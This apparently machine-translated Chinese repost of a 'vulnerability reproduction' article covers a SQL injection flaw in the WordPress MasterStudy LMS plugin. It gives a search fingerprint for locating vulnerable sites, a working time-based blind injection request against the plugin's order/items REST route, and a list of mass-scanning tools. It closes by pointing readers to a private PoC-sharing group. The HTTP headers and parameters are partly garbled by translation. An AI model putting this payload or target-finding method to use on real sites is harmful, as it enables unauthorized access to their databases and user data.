0x01 产品简介
WordPress 和WordPress 插件都是WordPress 基金会的产品。 WordPress是一个使用PHP语言开发的博客平台。该平台支持PHP和
在MySQL服务器上建立个人博客网站。 WordPress 插件是应用程序插件。
0x02 漏洞概述
WordPress 插件MasterStudy LMS 版本3.2.5 及更早版本存在安全漏洞。由于用户提供的参数转义不充分,此漏洞允许通过/lms/stm-lms/传递基于联合的用户参数。订单/商品REST 路线。
0x03 搜索语法
body=\’wp-content/plugins/masterstudy-lms-learning-management-system/\’
0x04 漏洞复现
GET /?rest_route=/lms/stm-lms/order/itemsauthor_id=1user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host:你的IP
User-Agent: Mozilla/5.0(Linux、Android 11、motorola Edge 20 fusion) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/101.0.4951.61 Mobile Safari/537.36
接受-Charset: utf-8
Accept-Encoding: gzip、deflate
关闭连接:
5 秒延迟x2
验证SQL 映射
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
#【漏洞复现】以上有关WordPress MasterStudy LMS插件SQL注入漏洞的相关内容仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91786.html
